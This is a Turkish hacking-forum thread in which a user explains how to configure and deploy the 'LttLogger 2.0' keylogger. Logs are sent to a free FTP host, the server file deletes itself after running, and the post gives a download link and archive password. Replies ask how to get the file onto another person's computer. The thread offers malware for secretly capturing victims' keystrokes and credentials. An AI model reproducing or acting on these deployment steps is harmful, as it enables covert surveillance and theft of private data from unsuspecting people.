Yine bir FTP Keylogger !! Yine Mail derdi Yok !! LttLogger 2.0 !!

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

TuRK_HaRD

нα¢кιηg αяαşтıямα¢ıѕı
Reaction score
0
-

ltt1.jpg

Radar Spy'dan sonra yine kayıtları FTP'den alacak, böylece bizi çalışmayan smtp server'lardan, gönderilmeyen log'lardan kurtaracak bir keylogger ile tekrardan karşınızdayız. LttLogger, kullanımı oldukça basit ama garanti sonuç olacağınız bir keylogger olacaktır.

Döküman yine tamamen bana (TuRK_HaRD'a) aittir, bunu da hatırlatmak isterim.

İlk olarak bize sorun çıkarmayacak bir ftp destekli freehost alıyoruz.. Şu günlerde testlerim sonucunda en uygun t35.com'u buldum.. Buradan giriş yapıyoruz:

http://www.t35.com/orderfree.shtml

resimlerdeki gibi önümüze çıkacak 4 sayfayı da doldurup kayıt işlemlerini bitiriyoruz:

radar1.jpg

radar2.jpg

radar3.jpg

radar4.jpg

Bu işlemler ardında mailimize bir aktivasyon linki gelecek.. Buna da tıklayıp kaydı bitiriyoruz..

Son olarak önümüze FTP bilgilerinin olduğu bir sayfa gelecek.. buradaki host ve kullanıcı adı bilgilerinin unutmayın, sizinkiler de buna göre olacak:

radar5.jpg

Şimdi EditServer programını açalım ve server'ımızı ayarlamaya başlayalım:

ltt1.jpg

ilk sayfamızda eğer server'ın ana dosyasının çalıştıktan sonra silinmesinin isterseniz "Melt Server"ı işaretleyin..

ltt2.jpg

Buraya FTP ayarlarınızı kendinize uygun olarak doldurun..

FTP adresinizin doğruluğunu test etmek için "Check FTP" butonuna basın..

ltt3.jpg

kayıtların tutulacağı dosya adını ve dosyanın boyutunu buraya yazın. (boyut bayt cinsinden oluyor.. örneğin 10000 yazarsanız bu 10kb demektir.)

kayıt dosyası uzantısı pol şeklinde kalsın.. açarken not defteri ile birlikte açın..

ltt4.jpg

burayı olduğu gibi bırakın..

En son Creat'e basın ve server'ınız oluşsun..

Kayıtları izlemek için herhangi bir ftp programına da ihtiyacınız yok..

Internet Explorer'ı açın, adres yerine "ftp.t35.com" yazın, ardından açılan pencereye kullanıcı adı ve şifrenizi yazın:

radar10.jpg

Ve bir süre sonra log'larınız html sayfası olarak gözükecektir.. Gerisi sizin açıp incelemenize kalıyor.

eğer girişte sorun yazıyorsanız ftp://[email protected] şeklinde adres çubuğuna yazın, herhangi bir uyarı gelirse evet diyip geçin ve şifrenizi girip devam edin..

Gördüğünüz gibi kullanımı oldukça basit.. Soru ve sorunlarınızı buradan alabilirim.

Download = http://rapidshare.com/files/70413978/LttLogger_v2.0__by_TuRK_HaRD.rar

rar şifresi = turk_hard

Kolay gelsin;)

(ANLATIM TAMAMEN TARAFIMA (TuRK_HaRD'a) AİT OLUP İZİN ALMADAN LÜTFEN KOPYALAMAYINIZ)

Beğendiğiniz paylaşımlarda
TEŞEKKÜR BUTONU'nu kullanmayı unutmayın..

eline sağlık usta ilk mesaj bnden ,çok gzl bi program tekrar tekrar ellerine sağlıkkk.

cOK GÜZEL PROGRAM USTAM..

Bekliyorum logları :)

FTP root at ftp.t35.com
Bu FTP sitesini Windows Gezgini'nde görüntülemek için, Sayfa'yı tıklatın ve ardından FTP Sitesini Windows Gezgini'nde Aç'ı tıklatın.

Böyle Bir Şey Karsıma Cıkıyor efendim Buna bir care?

calısmıoooooooooooooooooooooo

3 saatir 1 log gelmedi server dosyasini ismini mi degiştirdim ondan olabilir mi. deneme amacıyla serveri kendimde calıstırdım gine olmadı

Krdş ayarlamada haya yapmış olabilirsiniz.örn 10000 ayarlanmış siz 1000 vs. bişi yapın gelir.Dier türlüde gelir ama birz geçikmeli gelir...

turk_hard kardes kımsede mail gelmiyo ya nedenki.bi video yapamazmısın baksak.:(

ya benim anlamadıgım bi yer var.Kayıtların tutulacagın dosya adını yazıcazda.ftp'mdeki açtıgım klasörün adınımı yazıcam.O halde ben birine göndercem mesela dosyayı o açacak ama nasıl göndercem anlamadım yardımcı olrsanız sewnirim

FTP root at ftp.t35.com
Bu FTP sitesini Windows Gezgini'nde görüntülemek için, Sayfa'yı tıklatın ve ardından FTP Sitesini Windows Gezgini'nde Aç'ı tıklatın. Daha önce belirttigim gibi..

bir iki değişiklik yaptım döküman üstünde..

ftp'ye girişte hata alanlar tekrar göz atsın..

ayrıca kayıtların alınacağı log dosyasının uzantısını da orjinal haline getirdim.

sistem çalışıyor tekrar hatırlatayım.. eksiksiz olarak yapın..

bir iki değişiklik yaptım döküman üstünde..

ftp'ye girişte hata alanlar tekrar göz atsın..

ayrıca kayıtların alınacağı log dosyasının uzantısını da orjinal haline getirdim.

sistem çalışıyor tekrar hatırlatayım.. eksiksiz olarak yapın..

turk_hard program ıcın saolda.hani kayıtlı dosyanın adını yazıcazya kendı bilgisayarımda winrarlı dosya açtım diyelım winrarladım.İsmide A olsun dielım o KAYIT Adını yazcagımız yere A mı yazıcaz.Senin resmınde log.txt yazıor

turk_hard program ıcın saolda.hani kayıtlı dosyanın adını yazıcazya kendı bilgisayarımda winrarlı dosya açtım diyelım winrarladım.İsmide A olsun dielım o KAYIT Adını yazcagımız yere A mı yazıcaz.Senin resmınde log.txt yazıor

programın orjinalindeki pol uzantısı kalacak, txt olunca olmuyor..

dökümanda not düşmüştüm, gözünden kaçmış sanırım..

programın orjinalindeki pol uzantısı kalacak, txt olunca olmuyor..

dökümanda not düşmüştüm, gözünden kaçmış sanırım..

pol uzantısı kalcak demıssınde o nerde göremedım yıne ya :(. Bide mesela karsı tarafa göndercezya o dosyanın ismini nereye yazıcam

abi sende dosyanın ismini nereye yazıcam hç bişi bilmiorsan hack işi zor olur...Hack yapmayı iii örenmek istiosan yazılanları iyice oku ve ilk kendi pcnde dene ,PC formatlamasını bilmiosan ören,Bide yazılanları iyice oku harfi harfine uygula ayrıntıya çok takılmaa,1 yıl öncesine kadar bnde hack yapmayı çok istiodum ama yapamıodum şimdi yapmaya başladım.Bu aralarda bıraqtım hacki...

Denemekten zarar gelmez ; bir bakalım :goz:

Bu arada çok teşekkürler ... :clap

beyler kendi pc calıstı rapid e attım cafeye indirdim calıstı. işe yaramaz pro agent a devam

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri